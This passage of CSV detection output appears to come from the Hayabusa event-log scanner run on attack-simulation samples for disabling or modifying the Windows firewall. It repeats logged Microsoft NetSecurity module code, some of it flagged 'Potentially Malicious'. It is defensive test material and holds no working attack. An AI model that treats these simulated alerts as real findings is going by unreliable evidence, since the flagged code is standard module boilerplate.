$__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('InterfaceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${InterfaceType}) $__cmdletization_queryBuilder.FilterByProperty('InterfaceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallRule') -and (@('ByAssociatedNetFirewallRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallRule}, 'MSFT_NetFirewallRuleFilterByInterfaceType', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleFilterByInterfaceType', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByQuery', 'ByAssociatedNetFirewallRule', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByQuery', 'ByAssociatedNetFirewallRule', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = 
$true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallInterfaceTypeFilter.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetFirewallInterfaceTypeFilter' -Alias '*' function Set-NetFirewallInterfaceTypeFilter { [CmdletBinding(DefaultParameterSetName='Query (cdxml)', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] param( [Parameter(ParameterSetName='Query (cdxml)')] [string] ${PolicyStore}, [Parameter(ParameterSetName='Query (cdxml)')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType] ${InterfaceType}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() 
$__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('Query (cdxml)', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('InterfaceType')) { [object]$__cmdletization_value = ${InterfaceType} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'InterfaceType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { 
$__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'InterfaceType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallInterfaceTypeFilter.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetFirewallInterfaceTypeFilter' -Alias '*'",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 19:09:45.026 +09:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = 
$MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetInterfaceTypeFilter' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function Get-NetFirewallInterfaceTypeFilter { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] param( [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType[]] ${InterfaceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallRule}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] 
${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters 
$__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('InterfaceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${InterfaceType}) $__cmdletization_queryBuilder.FilterByProperty('InterfaceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallRule') -and (@('ByAssociatedNetFirewallRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallRule}, 'MSFT_NetFirewallRuleFilterByInterfaceType', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleFilterByInterfaceType', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByQuery', 'ByAssociatedNetFirewallRule', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByQuery', 'ByAssociatedNetFirewallRule', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = 
$true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallInterfaceTypeFilter.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetFirewallInterfaceTypeFilter' -Alias '*' function Set-NetFirewallInterfaceTypeFilter { [CmdletBinding(DefaultParameterSetName='Query (cdxml)', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] param( [Parameter(ParameterSetName='Query (cdxml)')] [string] ${PolicyStore}, [Parameter(ParameterSetName='Query (cdxml)')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType] ${InterfaceType}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() 
$__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('Query (cdxml)', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('InterfaceType')) { [object]$__cmdletization_value = ${InterfaceType} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'InterfaceType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { 
$__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'InterfaceType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallInterfaceTypeFilter.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetFirewallInterfaceTypeFilter' -Alias '*'",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 19:09:45.027 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; 
value=""True""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 19:09:45.027 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 19:09:45.027 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Get-NetFirewallInterfaceTypeFilter"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 19:09:45.028 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Set-NetFirewallInterfaceTypeFilter"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System 
Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 19:09:45.075 +09:00,srvdefender01.offsec.lan,4104,medium,,Potentially Malicious PwSh,"_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteUsers'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteMachine')) { [object]$__cmdletization_value = ${RemoteMachine} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteMachines'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteMachines'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { 
$__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallSecurityFilter.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetFirewallSecurityFilter' -Alias '*'",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 19:09:45.075 +09:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,"_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteUsers'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteMachine')) { [object]$__cmdletization_value = ${RemoteMachine} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteMachines'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteMachines'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = 
[Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallSecurityFilter.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetFirewallSecurityFilter' -Alias '*'",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 19:09:45.076 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 19:09:45.076 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; 
value=""""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 19:09:45.077 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Get-NetFirewallSecurityFilter"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 19:09:45.078 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Set-NetFirewallSecurityFilter"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 19:09:45.110 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall 
